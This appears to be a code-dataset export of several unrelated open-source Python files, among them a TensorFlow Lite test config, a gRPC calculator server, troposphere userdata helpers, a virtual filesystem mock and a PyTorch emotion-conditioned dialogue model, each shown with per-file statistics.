# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for sparse_to_dense."""
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.lite.testing.zip_test_utils import create_scalar_data
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_sparse_to_dense_tests(options):
"""Make a set of tests to do sparse to dense."""
test_parameters = [{
"value_dtype": [tf.float32, tf.int32, tf.int64],
"index_dtype": [tf.int32, tf.int64],
"value_count": [1, 3, 6, 8],
"dense_shape": [[15], [3, 10], [4, 4, 4, 4], [7, 10, 9]],
"default_value": [0, -1],
"value_is_scalar": [True, False],
}]
# Return a single value for 1-D dense shape, but a tuple for other shapes.
def generate_index(dense_shape):
if len(dense_shape) == 1:
return np.random.randint(dense_shape[0])
else:
index = []
for shape in dense_shape:
index.append(np.random.randint(shape))
return tuple(index)
def build_graph(parameters):
"""Build the sparse_to_dense op testing graph."""
dense_shape = parameters["dense_shape"]
# Special handle for value_is_scalar case.
# value_count must be 1.
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
value = tf.compat.v1.placeholder(
name="value", dtype=parameters["value_dtype"], shape=())
else:
value = tf.compat.v1.placeholder(
name="value",
dtype=parameters["value_dtype"],
shape=[parameters["value_count"]])
indices = set()
while len(indices) < parameters["value_count"]:
indices.add(generate_index(dense_shape))
indices = tf.constant(tuple(indices), dtype=parameters["index_dtype"])
# TODO(renjieliu): Add test for validate_indices case.
out = tf.sparse_to_dense(
indices,
dense_shape,
value,
parameters["default_value"],
validate_indices=False)
return [value], [out]
def build_inputs(parameters, sess, inputs, outputs):
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
input_value = create_scalar_data(parameters["value_dtype"])
else:
input_value = create_tensor_data(parameters["value_dtype"],
[parameters["value_count"]])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
| 38.894118 | 80 | 0.676346 |
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.lite.testing.zip_test_utils import create_scalar_data
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_sparse_to_dense_tests(options):
test_parameters = [{
"value_dtype": [tf.float32, tf.int32, tf.int64],
"index_dtype": [tf.int32, tf.int64],
"value_count": [1, 3, 6, 8],
"dense_shape": [[15], [3, 10], [4, 4, 4, 4], [7, 10, 9]],
"default_value": [0, -1],
"value_is_scalar": [True, False],
}]
def generate_index(dense_shape):
if len(dense_shape) == 1:
return np.random.randint(dense_shape[0])
else:
index = []
for shape in dense_shape:
index.append(np.random.randint(shape))
return tuple(index)
def build_graph(parameters):
dense_shape = parameters["dense_shape"]
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
value = tf.compat.v1.placeholder(
name="value", dtype=parameters["value_dtype"], shape=())
else:
value = tf.compat.v1.placeholder(
name="value",
dtype=parameters["value_dtype"],
shape=[parameters["value_count"]])
indices = set()
while len(indices) < parameters["value_count"]:
indices.add(generate_index(dense_shape))
indices = tf.constant(tuple(indices), dtype=parameters["index_dtype"])
out = tf.sparse_to_dense(
indices,
dense_shape,
value,
parameters["default_value"],
validate_indices=False)
return [value], [out]
def build_inputs(parameters, sess, inputs, outputs):
if parameters["value_is_scalar"] and parameters["value_count"] == 1:
input_value = create_scalar_data(parameters["value_dtype"])
else:
input_value = create_tensor_data(parameters["value_dtype"],
[parameters["value_count"]])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
| true | true |
1c3c8d952ab700f4ba2649d2330ad77bae914afb | 280 | py | Python | python-programming/unit34.py | s05252/course-2018-2 | 4695bf1556603fc2549464512afc96765f45132e | [
"Apache-2.0"
] | 1 | 2018-12-13T02:43:25.000Z | 2018-12-13T02:43:25.000Z | python-programming/unit34.py | s05252/course-2018-2 | 4695bf1556603fc2549464512afc96765f45132e | [
"Apache-2.0"
] | null | null | null | python-programming/unit34.py | s05252/course-2018-2 | 4695bf1556603fc2549464512afc96765f45132e | [
"Apache-2.0"
] | null | null | null | import pandas as pd
import numpy as np
alco2009 = pd.read_csv("niaaa-report2009.csv", index_col="State")
alco2009
population = pd.read_csv("population.csv", index_col="State")
population.head()
df = pd.merge(alco2009, population, left_index=True,
right_index=True)
df.head()
| 18.666667 | 65 | 0.757143 | import pandas as pd
import numpy as np
alco2009 = pd.read_csv("niaaa-report2009.csv", index_col="State")
alco2009
population = pd.read_csv("population.csv", index_col="State")
population.head()
df = pd.merge(alco2009, population, left_index=True,
right_index=True)
df.head()
| true | true |
1c3c8fa84a75a5fa6d2a28f5ef2b070cfbacecf2 | 551 | py | Python | redundant100/ncpus.py | luispedro/Coelho2021_GMGCv1_analysis | 5f1a62844631121cc11f8ac5a776d25baca56ff7 | [
"MIT"
] | 6 | 2021-12-16T09:20:28.000Z | 2022-03-29T03:21:48.000Z | redundant100/ncpus.py | luispedro/Coelho2021_GMGCv1_analysis | 5f1a62844631121cc11f8ac5a776d25baca56ff7 | [
"MIT"
] | 1 | 2022-02-18T01:56:56.000Z | 2022-02-22T14:39:48.000Z | redundant100/ncpus.py | luispedro/Coelho2021_GMGCv1_analysis | 5f1a62844631121cc11f8ac5a776d25baca56ff7 | [
"MIT"
] | 8 | 2021-12-17T02:14:50.000Z | 2022-03-21T06:40:59.000Z | def get_ncpus():
from os import environ
for ev in ['OMP_NUM_THREADS', 'Q_CORES', 'Q_CORE']:
if ev in environ:
return int(environ[ev].strip())
for ev in ['LSB_MCPU_HOSTS']:
if ev in environ:
break
else:
return 1
tokens = environ[ev].strip().split()
if len(tokens) > 2:
raise SystemError("Cannot handle this type of environment ({}='{}')".format(ev, environ[ev]))
return int(tokens[1])
if __name__ == '__main__':
print('Running with {} CPUS.'.format(get_ncpus()))
| 30.611111 | 101 | 0.588022 | def get_ncpus():
from os import environ
for ev in ['OMP_NUM_THREADS', 'Q_CORES', 'Q_CORE']:
if ev in environ:
return int(environ[ev].strip())
for ev in ['LSB_MCPU_HOSTS']:
if ev in environ:
break
else:
return 1
tokens = environ[ev].strip().split()
if len(tokens) > 2:
raise SystemError("Cannot handle this type of environment ({}='{}')".format(ev, environ[ev]))
return int(tokens[1])
if __name__ == '__main__':
print('Running with {} CPUS.'.format(get_ncpus()))
| true | true |
1c3c902c27fd52765d86d6f2fa245ea707da6cba | 1,239 | py | Python | code/server.py | cyberbeast/gRPC-learn | d46f7a8ab917df1d2469945a94f421e7406dd211 | [
"MIT"
] | null | null | null | code/server.py | cyberbeast/gRPC-learn | d46f7a8ab917df1d2469945a94f421e7406dd211 | [
"MIT"
] | null | null | null | code/server.py | cyberbeast/gRPC-learn | d46f7a8ab917df1d2469945a94f421e7406dd211 | [
"MIT"
] | null | null | null | import grpc
from concurrent import futures
import time
# import the generated classes
import calculator_pb2
import calculator_pb2_grpc
# import the original calculator.py
import calculator
# create a class to define the server functions, derived from calculator_pb2_grpc.CalculatorServicer
class CalculatorServicer(calculator_pb2_grpc.CalculatorServicer):
# calculator.square_root is exposed here
# the request and response are of the data type
# calculator_pb2.Number
def SquareRoot(self, request, context):
response = calculator_pb2.Number()
response.value = calculator.square_root(request.value)
return response
# create a gRPC server
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
# use the generated function `add_CalculatorServicer_to_server`
# to add the defined class to the server
calculator_pb2_grpc.add_CalculatorServicer_to_server(CalculatorServicer(), server)
# Listen on post 50051
print("Starting server. Listening on port 50051.")
server.add_insecure_port('[::]:50051')
server.start()
# since server.start() will not block, a sleep loop is added to keep alive
try:
while True:
time.sleep(86400)
except KeyboardInterrupt:
server.stop(0)
| 29.5 | 100 | 0.775626 | import grpc
from concurrent import futures
import time
import calculator_pb2
import calculator_pb2_grpc
import calculator
class CalculatorServicer(calculator_pb2_grpc.CalculatorServicer):
def SquareRoot(self, request, context):
response = calculator_pb2.Number()
response.value = calculator.square_root(request.value)
return response
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
calculator_pb2_grpc.add_CalculatorServicer_to_server(CalculatorServicer(), server)
print("Starting server. Listening on port 50051.")
server.add_insecure_port('[::]:50051')
server.start()
try:
while True:
time.sleep(86400)
except KeyboardInterrupt:
server.stop(0)
| true | true |
1c3c9034397d6200c1350af9bdba91cc9ca01849 | 1,382 | py | Python | troposphere/helpers/userdata.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | 4,573 | 2015-01-02T20:31:04.000Z | 2022-03-31T17:15:32.000Z | troposphere/helpers/userdata.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | 1,730 | 2015-01-02T19:24:47.000Z | 2022-03-31T23:22:52.000Z | troposphere/helpers/userdata.py | compose-x/troposphere | 9a94a8fafd8b4da1cd1f4239be0e7aa0681fd8d4 | [
"BSD-2-Clause"
] | 1,753 | 2015-01-01T01:24:12.000Z | 2022-03-27T05:36:17.000Z | #!/usr/bin/python
from troposphere import Base64, Join, Sub
def from_file(filepath, delimiter="", blanklines=False):
"""Imports userdata from a file.
:type filepath: string
:param filepath The absolute path to the file.
:type delimiter: string
:param: delimiter Delimiter to use with the troposphere.Join().
:type blanklines: boolean
:param blanklines If blank lines should be ignored
rtype: troposphere.Base64
:return The base64 representation of the file.
"""
data = []
try:
with open(filepath, "r") as f:
for line in f:
if blanklines and line.strip("\n\r ") == "":
continue
data.append(line)
except IOError:
raise IOError("Error opening or reading file: {}".format(filepath))
return Base64(Join(delimiter, data))
def from_file_sub(filepath):
"""Imports userdata from a file, using Sub for replacing inline variables such as ${AWS::Region}
:type filepath: string
:param filepath The absolute path to the file.
rtype: troposphere.Base64
:return The base64 representation of the file.
"""
try:
with open(filepath, "rt") as f:
data = f.read()
return Base64(Sub(data))
except IOError:
raise IOError("Error opening or reading file: {}".format(filepath))
| 24.678571 | 100 | 0.628075 |
from troposphere import Base64, Join, Sub
def from_file(filepath, delimiter="", blanklines=False):
data = []
try:
with open(filepath, "r") as f:
for line in f:
if blanklines and line.strip("\n\r ") == "":
continue
data.append(line)
except IOError:
raise IOError("Error opening or reading file: {}".format(filepath))
return Base64(Join(delimiter, data))
def from_file_sub(filepath):
try:
with open(filepath, "rt") as f:
data = f.read()
return Base64(Sub(data))
except IOError:
raise IOError("Error opening or reading file: {}".format(filepath))
| true | true |
1c3c90bd1e2e00a79b73dd931d49e343660c67de | 482 | py | Python | corehq/apps/export/migrations/0004_datafile_delete_after.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2020-05-05T13:10:01.000Z | 2020-05-05T13:10:01.000Z | corehq/apps/export/migrations/0004_datafile_delete_after.py | kkrampa/commcare-hq | d64d7cad98b240325ad669ccc7effb07721b4d44 | [
"BSD-3-Clause"
] | 1 | 2019-12-09T14:00:14.000Z | 2019-12-09T14:00:14.000Z | corehq/apps/export/migrations/0004_datafile_delete_after.py | MaciejChoromanski/commcare-hq | fd7f65362d56d73b75a2c20d2afeabbc70876867 | [
"BSD-3-Clause"
] | 5 | 2015-11-30T13:12:45.000Z | 2019-07-01T19:27:07.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-08-15 19:57
from __future__ import absolute_import, unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('export', '0003_emailexportwhendonerequest'),
]
operations = [
migrations.AddField(
model_name='datafile',
name='delete_after',
field=models.DateTimeField(null=True),
),
]
| 22.952381 | 56 | 0.636929 |
from __future__ import absolute_import, unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('export', '0003_emailexportwhendonerequest'),
]
operations = [
migrations.AddField(
model_name='datafile',
name='delete_after',
field=models.DateTimeField(null=True),
),
]
| true | true |
1c3c90cd1655328d4f508a455455fe9f552e4551 | 2,765 | py | Python | mockutils/fs.py | jhedev/mockutils | 643928ab135be233e1c16f8501d550b966e71089 | [
"MIT"
] | null | null | null | mockutils/fs.py | jhedev/mockutils | 643928ab135be233e1c16f8501d550b966e71089 | [
"MIT"
] | 1 | 2015-01-22T16:43:58.000Z | 2015-01-22T16:43:58.000Z | mockutils/fs.py | jhedev/mockutils | 643928ab135be233e1c16f8501d550b966e71089 | [
"MIT"
] | null | null | null | import os
class VirtualFile(object):
def __init__(self, name, content=None):
self.name = name
self.content = content
def __str__(self):
return self.name
class VirtualDir(object):
def __init__(self, name, content={}):
self.name = name
self.content = content
def __str__(self):
res = "{}/\n".format(self.name)
for c in self.content:
res += '\t{}'.format(str(c))
return res
class VirtualFS(object):
def __init__(self, content={}):
self.root = VirtualDir('/', content=content)
self.cwd = self.root.name
def __str__(self):
return str(self.root)
@staticmethod
def isdir_obj(obj):
if type(obj) is VirtualDir:
return True
else:
return False
@staticmethod
def isfile_obj(obj):
if type(obj) is VirtualDir:
return True
else:
return False
def absolute_path(self, path):
if path.startswith('/'):
return os.path.normpath(path)
else:
return os.path.normpath(os.path.join(self.cwd, path))
def resolve_path(self, path):
path_components = list(filter(bool,
self.absolute_path(path).split('/')))
current_file = self.root
for p in path_components:
if p in current_file.content:
current_file = current_file.content[p]
else:
raise FileNotFoundError
return current_file
def get_content(self, path):
fs_object = self.resolve_path(path)
if fs_object.content is not None:
return list(fs_object.content.keys())
def exists(self, path):
try:
f = self.resolve_path(path)
except FileNotFoundError:
return False
return True
def chdir(self, path):
if self.exists(path):
self.cwd = self.absolute_path(path)
else:
raise FileNotFoundError
def isdir(self, path):
resolved = self.resolve_path(path)
return VirtualFS.isdir_obj(resolved)
class MockOS(object):
def __init__(self, filesystem):
self.fs = filesystem
self.path = _MockOSPath(filesystem)
def listdir(self, path='.'):
return self.fs.get_content(path)
def getcwd(self):
return self.fs.cwd
def chdir(self, path):
self.fs.chdir(path)
class _MockOSPath(object):
def __init__(self, filesystem):
self.fs = filesystem
def isdir(self, path):
return self.fs.isdir(path)
def exists(self, path):
return self.fs.exists(path)
def abspath(self, path):
return self.fs.absolute_path(path)
| 24.469027 | 75 | 0.577939 | import os
class VirtualFile(object):
def __init__(self, name, content=None):
self.name = name
self.content = content
def __str__(self):
return self.name
class VirtualDir(object):
def __init__(self, name, content={}):
self.name = name
self.content = content
def __str__(self):
res = "{}/\n".format(self.name)
for c in self.content:
res += '\t{}'.format(str(c))
return res
class VirtualFS(object):
def __init__(self, content={}):
self.root = VirtualDir('/', content=content)
self.cwd = self.root.name
def __str__(self):
return str(self.root)
@staticmethod
def isdir_obj(obj):
if type(obj) is VirtualDir:
return True
else:
return False
@staticmethod
def isfile_obj(obj):
if type(obj) is VirtualDir:
return True
else:
return False
def absolute_path(self, path):
if path.startswith('/'):
return os.path.normpath(path)
else:
return os.path.normpath(os.path.join(self.cwd, path))
def resolve_path(self, path):
path_components = list(filter(bool,
self.absolute_path(path).split('/')))
current_file = self.root
for p in path_components:
if p in current_file.content:
current_file = current_file.content[p]
else:
raise FileNotFoundError
return current_file
def get_content(self, path):
fs_object = self.resolve_path(path)
if fs_object.content is not None:
return list(fs_object.content.keys())
def exists(self, path):
try:
f = self.resolve_path(path)
except FileNotFoundError:
return False
return True
def chdir(self, path):
if self.exists(path):
self.cwd = self.absolute_path(path)
else:
raise FileNotFoundError
def isdir(self, path):
resolved = self.resolve_path(path)
return VirtualFS.isdir_obj(resolved)
class MockOS(object):
def __init__(self, filesystem):
self.fs = filesystem
self.path = _MockOSPath(filesystem)
def listdir(self, path='.'):
return self.fs.get_content(path)
def getcwd(self):
return self.fs.cwd
def chdir(self, path):
self.fs.chdir(path)
class _MockOSPath(object):
def __init__(self, filesystem):
self.fs = filesystem
def isdir(self, path):
return self.fs.isdir(path)
def exists(self, path):
return self.fs.exists(path)
def abspath(self, path):
return self.fs.absolute_path(path)
| true | true |
1c3c91793e2535732d729bf77f497a54a5caf490 | 8,665 | py | Python | model/dec_rep.py | chenyangh/DialogueGenerationWithEmotion | 88433fa3ad32da5eab7923aef11fe34105a3e1f9 | [
"MIT"
] | 61 | 2018-02-19T06:21:44.000Z | 2022-02-14T09:17:46.000Z | model/dec_rep.py | chenyangh/DialogueGenerationWithEmotion | 88433fa3ad32da5eab7923aef11fe34105a3e1f9 | [
"MIT"
] | 9 | 2019-03-20T13:23:00.000Z | 2022-01-26T15:19:51.000Z | model/dec_rep.py | chenyangh/DialogueGenerationWithEmotion | 88433fa3ad32da5eab7923aef11fe34105a3e1f9 | [
"MIT"
] | 20 | 2018-04-08T15:37:55.000Z | 2021-11-12T08:13:05.000Z | import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
USE_CUDA = True
NUM_EMO = 9
class SoftDotAttention(nn.Module):
"""Soft Dot Attention.
Ref: http://www.aclweb.org/anthology/D15-1166
Adapted from PyTorch OPEN NMT.
"""
def __init__(self, dim):
"""Initialize layer."""
super(SoftDotAttention, self).__init__()
self.linear_in = nn.Linear(dim, dim, bias=False)
self.sm = nn.Softmax()
self.linear_out = nn.Linear(dim * 2, dim, bias=False)
self.tanh = nn.Tanh()
self.mask = None
def forward(self, input, context):
"""Propogate input through the network.
input: batch x dim
context: batch x sourceL x dim
"""
target = self.linear_in(input).unsqueeze(2) # batch x dim x 1
# Get attention
attn = torch.bmm(context, target).squeeze(2) # batch x sourceL
attn = self.sm(attn)
attn3 = attn.view(attn.size(0), 1, attn.size(1)) # batch x 1 x sourceL
weighted_context = torch.bmm(attn3, context).squeeze(1) # batch x dim
h_tilde = torch.cat((weighted_context, input), 1)
h_tilde = self.tanh(self.linear_out(h_tilde))
return h_tilde, attn
class PersonaLSTMAttentionDot(nn.Module):
r"""A long short-term memory (LSTM) cell with attention."""
def __init__(self, input_size, hidden_size, batch_first=True):
"""Initialize params."""
super(PersonaLSTMAttentionDot, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.num_layers = 1
self.batch_first = batch_first
self.input_weights = nn.Linear(input_size, 4 * hidden_size)
self.hidden_weights = nn.Linear(hidden_size, 4 * hidden_size)
self.emotion_weights = nn.Embedding(NUM_EMO + 1, 4 * hidden_size)
self.attention_layer = SoftDotAttention(hidden_size)
def forward(self, input, tag, hidden, ctx, ctx_mask=None):
"""Propogate input through the network."""
# tag = None #
def recurrence(input, hidden):
"""Recurrence helper."""
hx, cx = hidden # n_b x hidden_dim
gates = self.input_weights(input) + \
self.hidden_weights(hx) + \
self.emotion_weights(tag)
ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)
ingate = F.sigmoid(ingate)
forgetgate = F.sigmoid(forgetgate)
cellgate = F.tanh(cellgate) # o_t
outgate = F.sigmoid(outgate)
cy = (forgetgate * cx) + (ingate * cellgate)
hy = outgate * F.tanh(cy) # n_b x hidden_dim
h_tilde, alpha = self.attention_layer(hy, ctx.transpose(0, 1))
return h_tilde, cy
if self.batch_first:
input = input.transpose(0, 1)
output = []
steps = range(input.size(0))
for i in steps:
hidden = recurrence(input[i], hidden)
if isinstance(hidden, tuple):
output.append(hidden[0])
else:
output.append(hidden)
# output.append(hidden[0] if isinstance(hidden, tuple) else hidden)
# output.append(isinstance(hidden, tuple) and hidden[0] or hidden)
output = torch.cat(output, 0).view(input.size(0), *output[0].size())
if self.batch_first:
output = output.transpose(0, 1)
return output, hidden
class PersonaSeq2SeqAttentionSharedEmbedding(nn.Module):
"""Container module with an encoder, deocder, embeddings."""
def __init__(
self,
emb_dim,
vocab_size,
src_hidden_dim,
trg_hidden_dim,
ctx_hidden_dim,
attention_mode,
batch_size,
pad_token_src,
pad_token_trg,
bidirectional=True,
nlayers=2,
nlayers_trg=2,
dropout=0.,
):
"""Initialize model."""
super(PersonaSeq2SeqAttentionSharedEmbedding, self).__init__()
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.src_hidden_dim = src_hidden_dim
self.trg_hidden_dim = trg_hidden_dim
self.ctx_hidden_dim = ctx_hidden_dim
self.attention_mode = attention_mode
self.batch_size = batch_size
self.bidirectional = bidirectional
self.nlayers = nlayers
self.dropout = dropout
self.num_directions = 2 if bidirectional else 1
self.pad_token_src = pad_token_src
self.pad_token_trg = pad_token_trg
self.embedding = nn.Embedding(
vocab_size,
emb_dim,
self.pad_token_src
)
self.src_hidden_dim = src_hidden_dim // 2 \
if self.bidirectional else src_hidden_dim
self.encoder = nn.LSTM(
emb_dim,
self.src_hidden_dim,
nlayers,
bidirectional=bidirectional,
batch_first=True,
dropout=self.dropout
)
self.decoder = PersonaLSTMAttentionDot(
emb_dim,
trg_hidden_dim,
batch_first=True
)
self.encoder2decoder = nn.Linear(
self.src_hidden_dim * self.num_directions,
trg_hidden_dim
)
self.decoder2vocab = nn.Linear(trg_hidden_dim, vocab_size)
self.init_weights()
def init_weights(self):
"""Initialize weights."""
initrange = 0.1
self.embedding.weight.data.uniform_(-initrange, initrange)
self.encoder2decoder.bias.data.fill_(0)
self.decoder2vocab.bias.data.fill_(0)
def get_state(self, input):
"""Get cell states and hidden states."""
batch_size = input.size(0) \
if self.encoder.batch_first else input.size(1)
h0_encoder = Variable(torch.zeros(
self.encoder.num_layers * self.num_directions,
batch_size,
self.src_hidden_dim
), requires_grad=False)
c0_encoder = Variable(torch.zeros(
self.encoder.num_layers * self.num_directions,
batch_size,
self.src_hidden_dim
), requires_grad=False)
return h0_encoder.cuda(), c0_encoder.cuda()
def forward(self, input_src, input_trg, tag, trg_mask=None, ctx_mask=None):
"""Propogate input through the network."""
src_emb = self.embedding(input_src)
trg_emb = self.embedding(input_trg)
self.h0_encoder, self.c0_encoder = self.get_state(input_src)
src_h, (src_h_t, src_c_t) = self.encoder(
src_emb, (self.h0_encoder, self.c0_encoder)
)
if self.bidirectional:
h_t = torch.cat((src_h_t[-1], src_h_t[-2]), 1)
c_t = torch.cat((src_c_t[-1], src_c_t[-2]), 1)
else:
h_t = src_h_t[-1]
c_t = src_c_t[-1]
decoder_init_state = nn.Tanh()(self.encoder2decoder(h_t))
ctx = src_h.transpose(0, 1)
trg_h, (_, _) = self.decoder(
trg_emb, tag,
(decoder_init_state, c_t),
ctx,
ctx_mask
)
trg_h_reshape = trg_h.contiguous().view(
trg_h.size()[0] * trg_h.size()[1],
trg_h.size()[2]
)
decoder_logit = self.decoder2vocab(trg_h_reshape)
decoder_logit = decoder_logit.view(
trg_h.size()[0],
trg_h.size()[1],
decoder_logit.size()[1]
)
return decoder_logit
def decode(self, logits):
"""Return probability distribution over words."""
logits_reshape = logits.view(-1, self.vocab_size)
word_probs = F.softmax(logits_reshape)
word_probs = word_probs.view(
logits.size()[0], logits.size()[1], logits.size()[2]
)
return word_probs
def load_word_embedding(self, id2word):
import pickle
emb = np.zeros((self.vocab_size, self.emb_dim))
with open('feature/fasttextModel', 'br') as f:
model = pickle.load(f)
embed_dict = model.vocab
for idx in range(self.vocab_size):
word = id2word[idx]
if word in embed_dict:
vec = model.syn0[embed_dict[word].index]
emb[idx] = vec
else:
if word == '<pad>':
emb[idx] = np.zeros([self.emb_dim])
else:
emb[idx] = np.random.uniform(-1, 1, self.emb_dim)
self.embedding.weight = nn.Parameter(torch.FloatTensor(emb))
# self.word_embedding.weight.requires_grad = False
| 31.856618 | 79 | 0.586959 | import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
USE_CUDA = True
NUM_EMO = 9
class SoftDotAttention(nn.Module):
def __init__(self, dim):
super(SoftDotAttention, self).__init__()
self.linear_in = nn.Linear(dim, dim, bias=False)
self.sm = nn.Softmax()
self.linear_out = nn.Linear(dim * 2, dim, bias=False)
self.tanh = nn.Tanh()
self.mask = None
def forward(self, input, context):
target = self.linear_in(input).unsqueeze(2)
attn = torch.bmm(context, target).squeeze(2)
attn = self.sm(attn)
attn3 = attn.view(attn.size(0), 1, attn.size(1))
weighted_context = torch.bmm(attn3, context).squeeze(1)
h_tilde = torch.cat((weighted_context, input), 1)
h_tilde = self.tanh(self.linear_out(h_tilde))
return h_tilde, attn
class PersonaLSTMAttentionDot(nn.Module):
def __init__(self, input_size, hidden_size, batch_first=True):
super(PersonaLSTMAttentionDot, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.num_layers = 1
self.batch_first = batch_first
self.input_weights = nn.Linear(input_size, 4 * hidden_size)
self.hidden_weights = nn.Linear(hidden_size, 4 * hidden_size)
self.emotion_weights = nn.Embedding(NUM_EMO + 1, 4 * hidden_size)
self.attention_layer = SoftDotAttention(hidden_size)
def forward(self, input, tag, hidden, ctx, ctx_mask=None):
def recurrence(input, hidden):
hx, cx = hidden
gates = self.input_weights(input) + \
self.hidden_weights(hx) + \
self.emotion_weights(tag)
ingate, forgetgate, cellgate, outgate = gates.chunk(4, 1)
ingate = F.sigmoid(ingate)
forgetgate = F.sigmoid(forgetgate)
cellgate = F.tanh(cellgate)
outgate = F.sigmoid(outgate)
cy = (forgetgate * cx) + (ingate * cellgate)
hy = outgate * F.tanh(cy)
h_tilde, alpha = self.attention_layer(hy, ctx.transpose(0, 1))
return h_tilde, cy
if self.batch_first:
input = input.transpose(0, 1)
output = []
steps = range(input.size(0))
for i in steps:
hidden = recurrence(input[i], hidden)
if isinstance(hidden, tuple):
output.append(hidden[0])
else:
output.append(hidden)
output = torch.cat(output, 0).view(input.size(0), *output[0].size())
if self.batch_first:
output = output.transpose(0, 1)
return output, hidden
class PersonaSeq2SeqAttentionSharedEmbedding(nn.Module):
def __init__(
self,
emb_dim,
vocab_size,
src_hidden_dim,
trg_hidden_dim,
ctx_hidden_dim,
attention_mode,
batch_size,
pad_token_src,
pad_token_trg,
bidirectional=True,
nlayers=2,
nlayers_trg=2,
dropout=0.,
):
super(PersonaSeq2SeqAttentionSharedEmbedding, self).__init__()
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.src_hidden_dim = src_hidden_dim
self.trg_hidden_dim = trg_hidden_dim
self.ctx_hidden_dim = ctx_hidden_dim
self.attention_mode = attention_mode
self.batch_size = batch_size
self.bidirectional = bidirectional
self.nlayers = nlayers
self.dropout = dropout
self.num_directions = 2 if bidirectional else 1
self.pad_token_src = pad_token_src
self.pad_token_trg = pad_token_trg
self.embedding = nn.Embedding(
vocab_size,
emb_dim,
self.pad_token_src
)
self.src_hidden_dim = src_hidden_dim // 2 \
if self.bidirectional else src_hidden_dim
self.encoder = nn.LSTM(
emb_dim,
self.src_hidden_dim,
nlayers,
bidirectional=bidirectional,
batch_first=True,
dropout=self.dropout
)
self.decoder = PersonaLSTMAttentionDot(
emb_dim,
trg_hidden_dim,
batch_first=True
)
self.encoder2decoder = nn.Linear(
self.src_hidden_dim * self.num_directions,
trg_hidden_dim
)
self.decoder2vocab = nn.Linear(trg_hidden_dim, vocab_size)
self.init_weights()
def init_weights(self):
initrange = 0.1
self.embedding.weight.data.uniform_(-initrange, initrange)
self.encoder2decoder.bias.data.fill_(0)
self.decoder2vocab.bias.data.fill_(0)
def get_state(self, input):
batch_size = input.size(0) \
if self.encoder.batch_first else input.size(1)
h0_encoder = Variable(torch.zeros(
self.encoder.num_layers * self.num_directions,
batch_size,
self.src_hidden_dim
), requires_grad=False)
c0_encoder = Variable(torch.zeros(
self.encoder.num_layers * self.num_directions,
batch_size,
self.src_hidden_dim
), requires_grad=False)
return h0_encoder.cuda(), c0_encoder.cuda()
def forward(self, input_src, input_trg, tag, trg_mask=None, ctx_mask=None):
src_emb = self.embedding(input_src)
trg_emb = self.embedding(input_trg)
self.h0_encoder, self.c0_encoder = self.get_state(input_src)
src_h, (src_h_t, src_c_t) = self.encoder(
src_emb, (self.h0_encoder, self.c0_encoder)
)
if self.bidirectional:
h_t = torch.cat((src_h_t[-1], src_h_t[-2]), 1)
c_t = torch.cat((src_c_t[-1], src_c_t[-2]), 1)
else:
h_t = src_h_t[-1]
c_t = src_c_t[-1]
decoder_init_state = nn.Tanh()(self.encoder2decoder(h_t))
ctx = src_h.transpose(0, 1)
trg_h, (_, _) = self.decoder(
trg_emb, tag,
(decoder_init_state, c_t),
ctx,
ctx_mask
)
trg_h_reshape = trg_h.contiguous().view(
trg_h.size()[0] * trg_h.size()[1],
trg_h.size()[2]
)
decoder_logit = self.decoder2vocab(trg_h_reshape)
decoder_logit = decoder_logit.view(
trg_h.size()[0],
trg_h.size()[1],
decoder_logit.size()[1]
)
return decoder_logit
def decode(self, logits):
logits_reshape = logits.view(-1, self.vocab_size)
word_probs = F.softmax(logits_reshape)
word_probs = word_probs.view(
logits.size()[0], logits.size()[1], logits.size()[2]
)
return word_probs
def load_word_embedding(self, id2word):
import pickle
emb = np.zeros((self.vocab_size, self.emb_dim))
with open('feature/fasttextModel', 'br') as f:
model = pickle.load(f)
embed_dict = model.vocab
for idx in range(self.vocab_size):
word = id2word[idx]
if word in embed_dict:
vec = model.syn0[embed_dict[word].index]
emb[idx] = vec
else:
if word == '<pad>':
emb[idx] = np.zeros([self.emb_dim])
else:
emb[idx] = np.random.uniform(-1, 1, self.emb_dim)
self.embedding.weight = nn.Parameter(torch.FloatTensor(emb))
| true | true |
1c3c9190e82fbad0ab082a919e7b7efda37b87a8 | 2,442 | py | Python | supervisor/resolution/fixup.py | wschoot/supervisor | 58f803cc9bf27f7f8873cb7667b687b839fd2d2a | [
"Apache-2.0"
